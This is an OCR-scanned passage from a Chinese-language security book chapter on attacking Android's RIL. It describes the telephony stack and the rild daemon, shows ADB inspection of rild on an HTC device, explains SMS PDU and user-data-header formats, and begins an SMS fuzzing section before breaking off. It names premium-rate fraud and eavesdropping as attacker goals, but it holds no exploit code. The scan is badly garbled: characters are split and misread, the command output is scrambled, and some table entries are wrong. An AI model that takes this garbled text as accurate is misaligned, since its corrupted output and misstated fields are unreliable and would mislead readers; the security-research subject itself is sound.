块 ， 以 及 它们 协同 工作 的 方式 ; 攻击 部 分 则 主要 围绕 短信 服务 ( SMS ) 展开 ， 重 点 讨论 如 何在 
Android 设备 上 对 短信 服务 进行 模糊 测试 。 本 章 前 半 部 分 对 Android RIL 进行 概述 ， 并 介绍 SMS 
消息 的 格式 ; 后 半 部 分 则 深入 探讨 如 何 修改 RIL 的 代码 ， 从 而 对 Android 中 SMS 的 实现 代码 进 
行 模糊 测试 。 阅 读本 章 之 后 ， 你 将 拥有 足够 的 知识 对 Android 的 RIL 进行 安全 测试 。 




































































11.1 RLL 简介 


Android 中 的 RIL 是 移动 通信 硬件 接口 与 Android 电话 服务 子 系统 之 间 的 一 个 抽象 层 。 它 支 
持 GSM、CDMA、3G 和 4G LTE 等 所 有 类 型 的 移动 网 络 ， 处 理 移动 通信 中 所 有 具体 的 业务 ， 包 
括 网 络 注册 、 语 音 通话 、 短 信 ( SMS )、 分 组 数据 (IP 通信 ) 等 。 因 此 ，RIL 在 Android 设备 中 
扮演 重要 的 角色 。 

RIL 是 Android 中 极 少 数 可 以 直接 从 外 界 接触 到 的 代码 之 一 。 它 的 攻击 面 类 似 于 服务 器 上 部 
署 的 网 络 服务 ， 从 移动 网 络 发 送 到 Android 设备 的 所 有 数据 都 会 经 过 设备 中 的 RIL。 最 好 的 例子 
就 是 短信 的 接收 处 理 过 程 。 

当 短 信 发 送 至 Android 手机 时 , 会 由 手机 中 的 蜂 窜 调 制 解 调 嚣 接收。 蜂窝 调制 解 调 嚣 从 基站 
接收 物理 数据 并 解码 ， 然 后 将 解码 后 的 消息 传 给 Linux 内 核 。 这 条 消息 会 经 过 Android RIL 的 各 
个 组 件 , 最 终 抵达 负责 短信 收发 的 应 用 程序 。 短 信 在 RIL 内 部 的 传递 过 程 会 在 稍 后 详细 介绍 。 现 
在 需要 理解 的 是 ，Android 中 的 RIL 可 以 受到 远程 攻击 的 代码 。 

对 于 攻击 者 来 说 ,攻破 RIL 可 以 获得 各 种 效果 ， 比 如 用 于 欺诈 。RIL 的 主要 功能 是 与 数字 基 
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带 进行 交互 , 因此 控制 了 RIL 也 就 控制 了 基带 。 此 时 , 攻击 者 可 以 拨打 高 收费 电话 或 者 发 送 高 额 
费 率 的 扣 费 短信 ; 可 以 进行 欺诈 攻击 , 从 而 获得 金钱 收益 ; 还 可 以 进行 侦 听 或 其 他 间谍 行为 。 RIL 
可 以 控制 基带 中 的 其 他 功能 ,例如 设置 自动 应 答 。 对 企业 来 说 ,这 个 问题 可 能 非常 严重 。 还 有 可 
能 截获 所 有 流 经 RIL 的 数据 ， 从 而 访问 所 有 未 受 保护 ( 没有 进行 端 到 端 加 密 ) 的 数据 。 

总 之 , 成 功 攻破 RIL 后 ， 既 可 以 访问 敏感 信息 ， 也 可 以 劫持 设备 来 获取 现金 ,损害 设备 所 有 
者 的 利益 。 


























11.1.1 RIL 架构 


本 节 概 述 RIL 和 Android 电话 栈 。 首 先 了 解 目 前 智能 手机 通用 的 架构 ， 即 所 有 Android 设备 
使 用 的 架构 。 


11.1.2 ”智能 手机 架构 


为 了 更 好 地 理解 电话 栈 , 需要 简单 了 解 现代 智能 手机 的 架构 设计 。 配置 了 移动 通信 接口 的 平 
板 电 脑 也 采用 同样 的 架构 。 目 前 的 智能 手机 一 般 由 两 个 子 系统 组 成 , 它们 既 相 互 独立 ,又 共同 协 
作 。 第 一 个 子 系统 是 应 用 处 理 器 。 这 个 子 系统 包括 主 处 理 器 (通常 是 一 个 多 核 的 ARM CPU ) 和 
各 类 外 设 ， 比 如 显示 器 、 触 摸 屏 、 存 储 设备 和 音频 输入 输出 设备 等 。 第 二 个 子 系统 是 蜂窝 基带 或 
者 蜂 窒 调 制 解 调 器 。 这 个 基带 通常 由 一 个 ARM CPU 和 一 个 DSP ( 数字 信号 处 理 器 ) 组 成 ,负责 
在 手机 与 移动 通信 基础 设施 之 间 建 立 物理 层 的 无 线 连 接 。 设 备 具体 使 用 哪 种 应 用 处 理 器 和 基带 ， 
主要 取决 于 设备 的 制造 商 以 及 设备 支持 的 移动 网 络 类 型 ( 比如 GSM、CDMA 等 ), 在 设备 的 主板 
上 ,这 两 个 子 系统 互相 连接 。 有 时 为 了 降低 成 本 ， 芯 片 厂商 也 会 将 其 集成 到 一 块 芯片 中 , 但 从 功 
能 上 看 ， 它 们 依然 是 相互 独立 的 。 图 11-1 是 智能 手机 架构 的 抽象 示意 图 。 
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图 11-1 智能 手机 通用 架 














286 第 11 章 攻击 RIL 无 线 接口 层 





这 两 个 子 系统 之 间 的 接口 类 型 主要 取决 于 实际 使 用 的 组 件 以 及 设备 厂商 。 常 见 的 接口 包括 
SPI ( 串 行 外 设 接口 )、USB (通用 串 行 总 线 )、UART ( 通用 异步 收发 器 ) 和 共享 内 存 。 由 于 存在 
多 种 选择 ，RIL 往往 设计 得 非常 灵活 。 


11.1.3 Android 电话 栈 


Android 电话 栈 (Android Telephony Stack ) 由 4 部 分 组 成 ， 自 顶 向 下 分 别 是 : 电话 和 短信 应 
用 程序 应 用 程序 框架 、RIL 守 护 程 序 和 内 核 级 设备 驱动 -Android 系统 的 代码 分 别 由 Java 和 C/C++ 
实现 ; 前 者 运行 在 Dalvik 虚拟 机 中 ,后 者 则 以 本 地 机 器 码 的 形式 直接 运行 。 寻找 bug 时 ,这 个 特 
点 非常 重要 。 

具体 到 Android 电话 栈 ，Dalvik 与 本 地 代码 的 区 别 为 : 应 用 程序 部 分 用 Java 编写 ,在 Dalvik 
虚拟 机 中 执行 ， 用户 空 间 的 组 件 都 是 本 地 代码 ， 如 RIL 守护 程序 和 库 ; 当然 ，Linux 内 核 也 以 本 
地 代码 形式 执行 。 图 11-2 是 Android 电话 栈 的 概览 图 。 







应 用 层 
应 用 框架 层 
eg massg 约 各 ; Dalvik 
| Native 
用 户 空间 
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Linux 内 核 
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图 11-2” Android 电话 栈 
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1. 电话 相关 的 应 用 程序 

这 部 分 是 高 层 的 应 用 程序 ， 主要 包括 电话 拨号 器 和 短信 ， 实现 了 多 个 核心 功能 。 谷歌 将 实现 
某 种 功能 的 代码 称 为 跟踪 器 ( tracker ): 通话 跟踪 需 、 短 信 分 配器 、 服 务 跟 踪 器 和 数据 跟踪 器 等 。 
通话 跟踪 右 人 处理 语 音 通话 ， 比 如 拨打 或 者 挂 断 电话 。 短 信 分 配器 负责 处 理 短信 与 彩信 消息 。 服 务 
跟踪 器 负责 蜂窝 连接 ， 比 如 设备 是 否 已 经 连接 到 网 络 ， 接 收 级 别 是 多 少 ， 是 否 在 漫游 中 ， 等 等 。 
数据 跟踪 器 则 负责 数据 连接 (移动 上 网 )。 这 些 电话 的 应 用 程序 与 下 一 层 (应 用 程序 框架 层 ) 直 
接 通信 。 

2. 应 用 框架 层 

在 应 用 框架 层 中 ，RIL 的 组 件 主要 有 两 类 功能 : 第 一 ,提供 电话 相关 应 用 程序 与 RIL 守护 程 
序 之 间 的 通信 接口 ; 第 二 ， 对 不 同 移动 网 络 中 的 各 种 概念 进行 抽象 。 开 发 应 用 程序 时 ,开发 者 可 
以 通过 android.telephony 包 提 供 的 方法 来 使 用 这 些 抽象 概念 。 

3. 用 户 空 间 的 本 地 组 件 

用 户 空间 的 组 件 主要 包括 RIL 守护 程序 及 其 支持 库 。RIL 守护 程序 是 本 章 的 重点 前 述 对 象 ， 
在 11.1.5 节 和 11.1.6 节 中 会 进一步 介绍 。 

4. 内 核 

Linux 内 核 包含 了 电话 栈 的 最 底层 组 件 ， 主 要 是 基带 硬件 的 驱动 程序 。 这 些 驱 动 主 要 向 用 户 
空间 代码 提供 一 个 与 基带 进行 对 话 的 接口 。 该 接口 通常 是 一 个 串 行 链 路 ， 本 章 后 面 会 详细 介绍 。 


11.1.4 对 电话 栈 的 定制 


Android 电话 栈 中 的 各 层 都 可 以 定制 ， 其 中 一 些 是 必须 定制 的 ， 比 如 基带 驱动 程序 与 设备 硬 
件 的 适 配 。 除 此 之 外 , 设备 厂商 通常 也 会 对 其 他 不 必修 改 的 部 分 进行 定制 , 常见 的 有 蔡 换 拨号 器 、 
替换 或 者 修改 原 有 的 短信 与 彩信 软件 等 。 还 有 一 些 三 商会 对 电话 相关 的 框架 层 核 心 代 码 进 行 频繁 
改动 。 从 安全 的 角度 来 看 ， 这 些 定制 和 修改 产生 的 新 代码 尤其 有 价值 ， 因 为 它们 大 多 是 闭 源 的 ， 
而 且 可 能 并 尚未 经 过 安全 研究 者 的 审计 。 











































































































































































































11.1.5 ”RIL 守护 程序 


RIL 中 最 重要 的 组 件 是 RIL 守护 程序 (rild )。RIL 守护 程序 是 一 个 系统 核心 服务 ， 以 本 地 
Linux 进程 的 形式 运行 ， 主 要 功能 是 在 Android 电话 框架 层 与 设备 硬件 之 间 建 立 连接 。 具 体 方式 
是 通过 名 为 Binder 的 IPC 机 制 向 框架 层 提 供 接口 。 其 开源 部 分 的 源 代码 位 于 AOSP 源码 仓库 的 
hardware/ril 目录 下 。 

由 于 谷歌 的 特意 设计 ，rild 良好 地 支持 第 三 方 闭 源 的 硬件 代码 接口 。 为 了 做 到 这 一 点 ，rild 
提供 了 由 一 系列 函数 调用 和 回调 构成 的 一 整套 API。 启 动 时 ,rild 会 加 载 设备 厂商 提供 的 vendor-ril 
共享 库 。 在 vendor-ril 中 ， 厂 商 实 现 了 具体 硬件 的 相关 功能 。 

RIL 守护 程序 是 Android 设备 中 少数 由 init 进程 管理 的 服务 之 一 。 因 此 ， 它 会 在 系统 引导 时 
启动 ; 一 旦 进程 意外 终止 ,还 会 重新 启动 。 与 一 些 系统 服务 不 同 的 是 ，RIL 守护 进程 的 崩 演 通常 
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不 会 导致 设备 重启 会 让 系统 变 得 不 稳定 。 这 些 特 点 让 我 们 可 以 放心 地 操作 rild。 


不 同 设备 上 的 RI 守护 程序 有 细微 的 差别 。 后 面 我 们 会 用 自己 的 设备 来 举例 分 析 , 先 了 解 它 


的 配置 便于 在 自己 的 设备 上 操作 。 现 在 介绍 如 何 ' 











央 速 了 解 手 头 设备 的 rild 信息 。 这 





HTC One V 手机， 运行 Android 4.0.3 系统 和 HTC Sense 4.0 主题 。 























这 个 示例 用 的 是 


看 到 rild 加 载 的 所 有 动态 库 文件 。 


读 取 RIL 信息 的 主要 方法 是 在 ADB shell 中 执行 一 系列 命令 。 首 先 ， 找 出 rild 的 进程 ID (PID )。 
有 了 PID 就 可 以 通过 proc 文件 系统 来 查看 该 进程 的 各 类 信息 ， 











其 次 , 检查 init 脚本 文件 , 查 到 rild 使 用 了 哪些 UNIX 域 套 接 字 。 接 下 来 ,， 回 到 proc 文件 系统 中 ， 
查看 rild 打开 了 哪些 文件 ， 从 而 确定 rild 使 用 的 串 行 设备 名 称 。 最 后 ， 使 用 getprop 工具 dump 
出 所 有 与 RIL 相关 的 Android 系统 属性 。 


shell 
radio 


shell 
00008 
0000a 
400a9 
400b9 
4015e 


401edq000-401f3000 


shell 


@android:/ # ps 
1445 1 


@Qandroid:/ # 
000-0000a000 
000-0000pb000 
000-400b9000 
000-400bp000 
000-401edq000 


@Qandroid:/ # 


lgrep rild 


14364 


rw-p 
r-xp 
rw-p 
r-xp 
rw-p 


grep 


932 


00000000 
00002000 
00000000 
00010000 
00000000 
0008£000 


FL Ld. /lndt 
service ril-daemon /system/bin/rild 








B33: 
B33 
BD3.: 
b3 : 
D3 
B33 


ffffffff 40063fb4 S /system/bin/rild 


cat /proc/1445/maps 
r-xp 


小 9 
19 
19 
9 
49 
小 9 


dT 


socket rild stream 660 root radio 
socket rild-debug stream 660 radio system 
socket rild-htc stream 660 radio System 


shell@android:/data # ls -la 


gsm. 


ril 
正定 
二 
下 
ril 
于 让 下 


rils 
rils 
ONT 
FOE 





init. 


rild.libpath]: 
witch.ganlibpath]: 
witch.vendorlibpath]: 
il.def.agps.model]: 
HTC-ITA]: 


eh root root 
nd root root 
py root root 
nied root root 


version.ril-impl 


svc.ril-daemon]: 
.booted]: [1] 
ETT St [L129 





il.enable.a52. 


shell@android:/ $ getprop 


] 





lgrep ril 


lgrep ril 


284 
284 
1056 
1056 
998 
998 


[HTC-RIL 4.0.0024HM 


[zunning] 


1] 
.gsm.only .version]: 
.modem_link.status]: 
.reload.count]: [1 
.Sim.swap.status]: 
rild.libpath.ganlitel]: 


[2] 
[0] 


[0] 


/proc/1445/fqd lgrep 
201.3=0L=15 
2.0L3=0LSLt5 
2.01 3=0L = 二 5 
2013-01-15 


(Mar 


2 
12:: 
2s 
2 


/system/bin/rild 
/system/bin/rild 


/system/l1ib/libril.so 
/system/lib/libril.so 


/system/lib/libhtc_ ril.so 
/system/lib/libhtc_ ril.so 


deyv 

55 13 -> /dev/smd0 
55 14 -> /dev/qmi0 
55 15 -> /dev/qmil 
55 16 -> /dev/qmi2 


6 2012,10:40:00)] 


[/system/l1ib/librilswitch.so] 


[/system/lib/libhtc_ril.so] 


[/system/lib/libganril.so] 


[2] 
[1] 


[/system/lib/libhtc_ril.so] 
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ro.ril.enable.a52]: [0] 
ro.ril.enable.a53.HTC-ITA]: [1] 
ro.ril.enable.a53]: [1] 
ro.ril.enable.amr.wideband]: [1] 
ro.ril.enable.dtm]: [1] 
ro.ril.enable.managed.roaming]: [1] 
ro.ril.gprsclass]: [12] 
ro.ril.hsdpa.category]: [10] 
ro.ril.hsupa.category]: [6] 
ro.ril.hsxpal]: [2] 














上 面 的 输出 结果 包含 许多 重要 的 数据 片段 ， 比 如 vendor-ril 库 的 具体 文件 名 是 libhte_ril.so。 
还 得 到 了 rild 使 用 的 套 接 字 , 位 于 /dev/socket 下 。 这些 套 接 字 各 有 各 的 用 处 , 比如 /dev/socket/rild-debug 
和 /dev/socket/rild-htc 为 调试 rild 和 vendor-ril 提供 辅助 。 这 些 输出 的 数据 中 ， 最 重要 的 信息 是 与 
蜂 突 基 带 进 行 通信 的 串 行 设备 名 称 。 在 这 部 HTC One V 手机 上 ， 该 设备 是 /dewsmd0。 从 安全 的 
角度 来 看 ， 这 个 弟 行 设备 非常 重要 ， 因 为 rild 通过 它 向 调制 解 调 器 发 送 命令 ， 包 括 收 发 短信 等 ， 
因此 这 个 通信 链 路 非常 容易 遭受 攻击 。 

2. 安全 性 

RIL 守护 程序 是 Android 设备 上 为 数 不 多 可 以 从 外 界 直接 抵达 的 代码 片段 之 一 。rild 和 
vendor-ril 都 是 用 C 和 C++ 编写 ， 然 后 编译 成 本 地 代码 运行 。 这 两 种 语言 都 不 是 内 存 安全 的 ， 因 
此 可 能 成 为 各 类 安全 问题 的 主要 源头 。RIL 守护 程序 需要 处 理 不 同 来 源 的 各 种 数据 ， 比 如 解析 并 
处 理 来 自 蜂窝 调制 解 调 器 和 Android 框架 层 的 数据 和 控制 信息 ， 最 直接 的 例子 就 是 短信 。 

处 理 接 收 到 的 短信 时 , 需要 遍历 人 硬件 和 软件 中 的 多 个 模块 ,每 个 都 有 可 能 成 为 攻击 目标 。 短 
信 发 送 到 Android 设 备 上 以 后 ,会 被 基带 接收 。 基 带 将 物理 层 链 路 传输 的 数据 进行 解码 ,通过 Linux 
内 核 中 的 基带 驱动 程序 进行 转发 。 内 核 里 的 驱动 会 将 这 条 短信 转 给 RIL 守护 程序 中 的 vendor-ril 
库 ，RIL 守护 程序 再 将 其 推送 给 Android 电话 栈 的 框架 层 。 可 以 看 到 ， 在 几乎 每 一 个 Android 设 
备 上 ，RIL 中 的 代码 都 可 以 受到 远程 攻击 。 通 常情 况 下 ， 攻 击 者 更 喜欢 开展 远程 攻击 ， 这 样 就 不 
需要 与 受害 用 户 进 行 直接 交互 或 接触 。 

刚 启动 时 ，RIL 守护 进程 通常 以 root 权限 执行 。 为 了 降低 风险 ， 它 在 启动 后 会 很 快 将 权限 
降低 为 radio 用 户 。radio 用 户 只 能 访问 完成 其 职责 所 必需 的 资源 。 不 过 正如 前 面 所 说 ，rild 需 
要 访问 的 资源 本 来 就 包括 许多 重要 数据 ( 比如 短信 )， 还 要 完成 许多 重要 功能 ( 比如 发 送 短信 、 
拨打 电话 )。 从 另 一 个 角度 看 ，radio 用 户 和 同名 的 用 户 组 也 用 于 确保 不 把 rild 专用 的 资源 暴露 
给 其 他 用 户 。 







































































































































































11.1.6 ”用 于 vendor-ril 的 API 


vendorril 与 制造 商 、 设 备 型 号 紧密 相关 ， 人 负责 与 具体 的 蜂窝 基 带 硬件 进行 交互 。 直 到 今天 ， 
基带 依然 是 高 度 私 有 化 的 ,因此 RIL 子 系统 被 特意 设计 成 只 支持 二 进 制 文件 形式 的 扩展 。 事 实 上 ， 
设备 厂商 通常 会 以 不 披露 协议 (NDA ) 的 法 律 形式 来 防止 源 代码 泄露 。 

从 安全 的 角度 来 看 ， 这 些 vendor-ril 库 非 常 重要 。 它 们 通常 只 以 二 进 制 文件 的 形式 发 布 ， 
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此 基本 没有 被 Android 社区 审计 过 。 在 Android 系统 中 ，vendorril 还 是 一 块 经 常 需要 定制 和 修改 
的 代码 ,其 稳定 性 也 一 直 是 个 大 问题 ， 因 此 发 布 的 库 中 可 能 会 包含 隐藏 的 、 没 有 进行 加 固 的 调试 
功能 。 综 上 所 述 ，vendor-ril 的 代码 中 存在 bug 和 漏洞 的 可 能 性 更 大 。 

RIL 与 基带 之 间 的 通信 

rild 与 基带 的 交互 是 在 vendor-ril 中 实现 的 ， 这 完全 取决 于 厂商 和 基带 型 号 。 它 可 能 是 一 种 
私有 协议 ， 也 可 能 是 基于 文本 的 标准 GSM AT 指令 集 。 如 果 某 个 基带 使 用 了 GSM AT 指令 集 ， 
那 相关 的 Linux 内 核 驱 动 一 般 会 在 /dev 文件 系统 下 提供 一 些 串 行 设备 。 此 时 , RIL 守护 程序 只 需 
要 打开 指定 设备 ， 就 可 以 用 GSM AT 协议 进行 通信 。 虽 然 协 议 是 标准 化 的 ， 但 基带 制造 商 可 能 
会 在 其 基带 中 增加 自己 定制 的 指令 。 因 此 , 各 种 情况 都 需要 一 个 与 之 相 匹 配 的 vendor-ril 库 来 协 
作 。 此 外 ， 就 算 使 用 了 标准 的 指令 ， 大 部 分 基带 的 行为 也 会 各 有 不 同 。 不 管 怎样 ， 协 议 的 细节 
完全 取决 于 制造 商 。 
















































































注意 GSM AT 指令 集 的 更 多 信息 参阅 : http:/www.etsi.org/deliveretsi i ets/300600 300699/ 
300642/04 60/ets 300642e04p pdf。 





简 音 起见， 本章 只 介绍 基于 AT 指令 集 的 调制 解 调 器 通信 。 目 前 有 一 些 和 有 的 基带 协议 得 到 
逆向 ， 并 有 开源 的 重新 实现 ， 比 如 所 有 三 星 设 备 使 用 的 协议 。 可 以 在 Replicant 项 目 中 找到 这 个 
协议 的 更 多 信息 : http://redmine.replicant.us/projects/replicant/wiki/SamsungModems。 


11.2 ”短信 服务 


短信 服务 ( SMS ) 是 移动 网 络 的 一 项 基础 服务 。 绝 大 部 分 用 户 对 SMS 的 了 解 仅 限于 从 一 部 
手机 向 男 一 部 手机 发 送 文 本 消息 。 实际 上 , 它 还 被 用 于 移动 网 络 基础 设施 与 移动 手持 设备 之 间 所 
有 类 型 的 通信 。 

20 年 前 ,， GSM 协会 (全球 移动 通信 系统 协会 , 亦 简 称 为 GSMA ) 就 完成 了 SMS 的 标准 化 工 
作 。 它 并 非 移动 网 络 最 初 设计 的 一 部 分 ， 而 是 稍 后 才 被 列 人 标准 。SMS 使 用 控制 信道 传输 数据 ， 
该 信道 主要 用 于 基站 和 移动 设备 之 间 拨 打 和 接听 电话 的 信号 传输 。 由 于 使 用 了 这 个 控制 信道 ， 
SMS 消息 的 长 度 被 局 限 在 140 字 节 或 160 个 7 比特 字符 之 内 。 目 前 ,几乎 所 有 类 型 的 移动 通信 网 
络 都 支持 SMS 服务 。 


11.2.1 ”SMS 消息 的 收发 


使 用 一 部 手机 向 另 一 部 发 送 短信 时 , 这 条 短信 并 不 是 直接 从 前 者 传输 到 后 者 。 发 送 短信 的 手 
机 会 将 短信 发 送 到 移动 网 络 中 一 个 称 为 短 消 息 服务 中 心 (SMSC ) 的 地 方 。 之 后 ， 短 信 会 经 过 多 
个 中 间 SMSC 节点 的 传递 ， 最 终 被 递送 到 目标 手机 。 

SMSC 的 作用 并 不 只 是 在 发 送 者 和 接收 者 之 间 传 递 短 信 。 如 果 接 收 短信 的 手机 不 在 基站 范围 
内 或 者 已 关机 ，SMSC 会 将 这 条 短信 存储 到 一 个 队列 中 , 直到 那 部 手机 再 次 变 为 在 线 状 态 。SMS 
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的 递送 只 是 “尽力 而 为 ”, 也 就 是 说 , 并 不 能 保证 短信 一 定 会 递送 到 。SMS 标准 中 有 一 个 有 效 期 值 
( Time-To-Live，TTL )， 用 于 设 定 短 信 在 队列 中 储存 多 久 后 被 丢弃 。 
移动 设备 中 接收 和 处 理 短信 的 过 程 会 在 11.3 节 中 详细 介绍 。 





11.2.2 ”SMS 消息 格式 


前 面 已 经 提 到 ，SMS 的 功能 并 不 仅 是 在 手机 之 间 发 送 文本 消息 ， 它 还 用 于 修改 或 更 新 手机 
配置 信息 ， 发 送 铃声 和 彩信 ， 通知 用 户 有 新 的 语音 邮件 ， 等 等 。 为 了 实现 这 些 特性 ， 除 了 支持 纯 
文本 格式 的 消息 外 ，SMS 还 支持 发 送 二 进 制 数据 。 因 此 ，SMS 在 移动 安全 方面 值得 关注 。 本 节 
将 简要 介绍 SMS 消息 格式 中 几 个 最 重要 的 部 分 ， 更 多 细节 可 以 参考 3GPP SMS 标准 : 
http:/www.3gpp.org/ftp/Specs/html-info/23040.htm。 

1. SMS 格式 

SMS 消息 有 两 种 不 同 的 格式 ， 具 体 使 用 取决 于 消息 是 从 手机 发 送 到 SMSC， 还 是 从 SMSC 
发 送 到 手机 。 这 两 种 格式 区 别 不 大 。 由 于 我 们 只 关心 递送 侧 (也 就 是 手机 侧 的 ) 消息 ， 所 以 本 节 
只 介绍 名 为 SMS-Deliver 的 递送 格式 。 表 11-3 描述 了 这 一 格式 。 


表 11-3 SMS PDU 格式 






















































































字段 名 字 节 数 用 途 
SMSC 可 变 SMSC 号 码 
Deliver 1 消息 标志 
Sender 可 变 发 送 者 号 码 
TP-PID 1 协议 ID 
TP-DCS 1 数据 编码 方案 
TP-SCTS 7 时 间 惟 

UDL 1 ] 户 数据 长 度 
UD 可 变 SMSC 号 码 








下 面 的 数据 就 是 一 个 SMS Deliver PDU 格式 的 SMS 消息 。 这 就 是 该 消息 从 蜂 窒 调 制 解 调 屁 
传 给 手机 的 电话 栈 时 的 样子 。 


0891945111325476F8040D91947187674523F100003150821142154 
00DC8309BFD060DD16139BB3C07 


该 消息 的 开头 是 SMSC 信息 。 SMSC 信息 的 第 一 字 节 是 长 度 域 ( 说 明 后 面 附带 的 SMSC 数据 
长 度 )， 接 下 来 的 字 节 是 电话 号 码 类 型 域 ( 这 里 的 91 是 指 国际 格式 )， 然 后 是 多 字 节 (前面 给 出 
的 长 度 减 1 字 节 ) 的 SMSC 号 码 。 在 PDU 中 ，SMSC 号 码 的 编码 方式 为 将 每 个 字 节 的 高 4 位 和 
低 4 位 进行 对 调 。 此 外 ， 由 于 这 个 号 码 结束 时 没有 保证 字 节 对 齐 ( 即 出 现 了 半 字 节 )， 因 此 会 用 
F 在 空 档 里 填充 半 字 节 。 现 在 ， 可 以 将 前 面 PDU 消息 数据 中 的 SMSC 号 码 解码 成 : 


长 度 类 型 号 码 
08 2 491511234567.8 
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接 下 来 是 Deliver 字段 ， 它 给 出 了 消息 头 部 标志 位 。 这 个 字段 的 长 度 是 1 字 节 ， 用 于 说 明 各 
类 情况 ， 比 如 还 有 更 多 的 消息 要 发 送 ( 本 例 中 的 0x04 这 个 值 )， 或 者 用 户 数据 (UD ) 字段 中 包 
含 一 个 用 户 数据 头 (UDH )。 后 者 会 通过 用 户 数据 头 指 示 位 (UDHI bit ) 来 指明 。 本 节 后 面 将 简 
要 介绍 UDH。 

接 下 来 的 字段 是 发 送 方 号 码 。 它 的 格式 与 SMSC 号 码 基 本 一 致 ， 唯 一 的 区 别 是 长 度 域 。 发 
送 方 号 码 的 长 度 域 是 以 手机 号 码 中 数字 的 个 数 ， 而 不 是 以 存储 在 PDU 中 实际 所 用 的 字 节 数 来 
计算 的 。 


长 度 类 型 号 码 
0D 91 4917787654321 


发 送 方 号 码 之 后 是 协议 标识 符 ( TP-PID ) 字段 。TP-PID 的 值 有 多 重 不 同 的 含义 ， 这 取决 于 
其 中 某 些 位 是 否 被 置 上 。 它 通常 会 被 设置 成 0x00。 后 面 一 个 字段 是 数据 编码 方案 (TP-DCS ) 字 
段 ， 定义 了 这 条 消息 的 用 户 数据 (UD ) 字段 的 编码 方式 。 支 持 的 编码 方案 包括 7 位 、8 位 和 16 
位 字母 表 。 这 个 字段 还 指明 是 否 对 数据 进行 了 压缩 。 对 于 7 位 编码 的 未 压缩 消息 ,这 个 字段 的 值 
是 0x00， 而 对 于 8 位 编码 的 未 压缩 数据 ， 则 会 是 0x04。 这 个 示例 里 的 值 是 0x00， 说 明 后 面 是 7 
位 编码 的 文本 。 

接 下 来 的 字段 是 该 消息 的 时 间 戳 (TP-SCTS )。 时 间 戳 一 共 使 用 7 字 节 ， 依 次 是 年 、 月 、 日 ， 
等 等 。 其 中 每 个 字 节 都 采用 了 高 4 位 和 低 4 位 交换 的 编码 。 因 此 , 这 个 示例 消息 中 的 时 间 惟 表明 ， 
该 消息 的 发 送 时 间 是 2013 年 5 月 28 日 。 

下 面 的 用 户 数据 长 度 (UDL ) 字段 与 数据 编码 方案 (TP-DCS ) 是 相关 的 。 当 TP-DCS 是 7 
位 编码 时 ， 这 个 字段 给 出 的 就 是 用 户 数据 中 存储 了 多 少 个 7 位 元 素 。 在 这 个 示例 中 , 说 明 其 中 存 
储 了 13 (0x0D ) 个 7 位 元 素 。 最后， 示例 中 的 用 户 数据 是 c8309BFD060DD16139BB3C07， 解 
但 后 是 Hello Charles。 

2. SMS 用 户 数据 头 

SMS 用 户 数据 头 ( UDH ) 用 于 实现 除 简单 文本 信息 之 外 的 其 他 各 种 SMS 功能 ， 比 如 超 长 短 
信 、 端 口 编 址 短信 、 提 示 信 息 (如 新 的 语音 邮件 , 即 Android 通知 栏 上 出 现 的 小 邮件 符号 )、WAP 
推送 以 及 基于 WAP 推送 的 彩信 ( MMS ) 等 。 在 SMS-Deliver 格式 中 , UDH 是 用 户 数据 字段 的 一 
部 分 。Deliver 字段 中 的 UDHI 标 志 用 于 指示 后 面 的 用 户 数据 里 是 否 含 有 UDH。 

UDH 是 一 个 通用 的 数据 域 ， 由 两 部 分 组 成 : 长 度 域 (UDHL ) 和 数据 域 。 长 度 域 给 出 了 整个 
数据 域 的 字 节 数 ， 而 数据 域 则 采用 一 种 名 为 “信息 元 素 ”(IE ) 的 “类 型 -长 度 - 值 ”(TLV ) 格 
式 进行 编码 。IE 格式 的 结构 如 表 11-4 所 示 。 


表 11-4 IE 格式 
字段 字 节 数 
信息 元 素 标识 符 (IEI ) 
言 息 元 素数 据 长 度 (IEDL ) 
信息 元 素数 据 (IED ) 可 变 
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第 一 字 节 叫 作 IEI， 表 示 正 的 类 型 ;第 二 字 节 叫 作 IEDL， 表 示 IE 的 长 度 ; 接 下 来 的 多 字 节 
叫 作 IED， 存 储 实际 的 数据 。 每 个 UDH 中 可 以 有 任意 多 个 下 。 下 面 的 示例 是 包含 了 一 个 下 的 
UDH， 其 中 的 下 说 明 这 是 一 条 超 长 短信 的 片段 。 

050003420301 

UDH 长 度 是 0x05， 超 长 短信 头 部 的 IEI 是 0x00， 长 度 是 0x03， 其 余部 分 是 该 下 的 数据 。 
这 个 超 长 短信 片段 正 的 格式 是 消息 ID (0x42 )、 分 片 总 数 (0x03 ) 以 及 当前 片段 编号 (0x01 )。 

在 SMS 标准 中 可 以 找到 标准 化 IEI 的 完整 列表 和 更 多 详细 信息 : http://www.3gpp.org/ftp/ 
Specs/html-info/23040.htm。 


11.3 ”与 调制 解 调 器 进行 交互 


本 节 介 绍 与 Android 智能 手机 的 调制 解 调 需 进行 交互 的 必要 步 又 。 与 调制 解 调 需 进行 交互 的 
原因 有 很 多 ， 本 章 的 主要 目的 是 对 电话 栈 进 行 模 糊 测试 。 


11.3.1 模拟 调制 解 调 器 用 于 模糊 测试 


要 寻找 RIL 相关 组 件 中 的 bug 和 漏洞 ,模糊 测试 是 一 种 有 效 的 方法 。 第 6 音 介 绍 过 ,模糊 测 
试 有 意 构 造 恶 意 格 式 的 输入 数据 ,然后 测试 软件 对 输入 数据 的 校 验 程度 。 它 有 悠久 的 历史 ,可 以 
有 效 地 达到 目的 。 要 成 功 进行 模糊 测试 ， 需 要 完成 三 项 工作 : 生成 输入 数据 ,运行 测试 用 例 ， 以 
及 监控 软件 崩溃 状况 。 

对 RIL 而 言 , 如果 SMS 处 理 代码 中 存在 漏洞 ,会 是 不 错 的 攻击 途径 。 因 为 SMS 有 开放 的 标 
准 和 完善 的 文档 ， 所 以 基于 标准 实现 一 个 自动 生成 各 类 SMS 信息 的 程序 非常 容易 。 因 此 ，SMS 
是 完美 的 模糊 测试 目标 。 本 章 稍 后 会 演示 一 个 简单 的 SMS 模糊 生成 锅 。 

接 下 来 需要 将 这 些 亚 意 的 输入 传递 给 要 进行 模糊 测试 的 软件 组 件 。 这 里 要 测试 的 组 件 是 rild。 
通常 情况 下 ，SMS 消息 以 OTA (OverThe-Air ) 的 方式 传递 : 发 送 手机 将 信息 发 送 给 移动 网 络 ， 
移动 网 络 再 将 信息 转发 给 接收 手机 。 但 是 以 这 种 方法 发 送 SMS 消息 会 有 一 些 问题 。 

首先 ， 通 过 实际 网 络 递送 信息 非常 慢 ,可 能 要 好 几 秒 钟 。 其 次 ， 有 些 运 营 商 和 国家 可 能 无 法 
